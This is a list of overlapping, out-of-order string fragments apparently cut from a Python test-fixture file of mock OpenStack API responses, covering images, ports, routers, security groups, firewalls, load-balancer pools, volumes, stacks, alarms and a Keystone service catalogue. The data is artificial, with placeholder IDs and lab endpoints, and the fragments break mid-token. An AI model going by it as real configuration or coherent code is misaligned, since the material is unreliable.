"\"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\":",
"\"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1],",
"PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ]",
"\"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\":",
"\"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"]",
"LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\":",
"\"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\":",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"\"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0],",
"LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN =",
"] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\",",
"\"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\":",
"Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not",
"'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5'",
"\"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\":",
"u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name':",
"25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova',",
"[\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"]",
"2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\":",
"{ \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ]",
"[], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST",
"\"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0],",
"\"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\":",
"}, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\":",
"[], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\":",
"\"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None,",
"COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT",
"'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service',",
"}, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"= { \"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\",",
"License, Version 2.0 (the \"License\"); you may # not use this file except",
"\"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\":",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None,",
"'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5'",
"'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity'",
"Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}],",
"\"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\",",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }",
"\"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" }",
"\"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\":",
"} LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80,",
"1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\",",
"PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" },",
"u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'},",
"\"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\":",
"VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' },",
"}, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\",",
"\"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server",
"\"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST =",
"\"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ]",
"ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }],",
"world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS",
"\"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True,",
"'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type':",
"None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None,",
"\"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\":",
"\"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\",",
"'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1'",
"\"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ]",
"], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\",",
"{ 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [],",
"{ \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\"",
"under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"= [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID =",
"\"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY =",
"\"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'],",
"[{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity",
"[], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = {",
"\"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\":",
"Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT,",
"\"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\",",
"[ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated':",
"\"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\",",
"\"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\",",
"\"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\":",
"\"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" }",
"'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service',",
"4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\",",
"\"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST",
"\"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1]",
"PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{",
"except in compliance with the License. You may obtain # a copy of",
"FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\":",
"[], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\":",
"{ \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\":",
"\"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\":",
"\"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\",",
"} } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74',",
"[{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image",
"[\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"]",
"'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [",
"= { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\",",
"\"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = {",
"\"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\":",
"[ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None,",
"{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ],",
"\"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 =",
"test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\":",
"'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net'",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, {",
"{ 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': {",
"= 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT =",
"\"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = {",
"'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute'",
"\"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom",
"\"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" }",
"PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\":",
"\"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\":",
"\"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\":",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\":",
"\"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25,",
"FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS",
"firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False,",
"\"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST =",
"\"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\":",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\":",
"\"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False },",
"[ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\":",
"\"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\",",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{",
"{ 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\":",
"u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST",
"IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT",
"True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\":",
"v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\",",
"firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\":",
"\"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\":",
"\"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\":",
"'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777'",
"\"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ]",
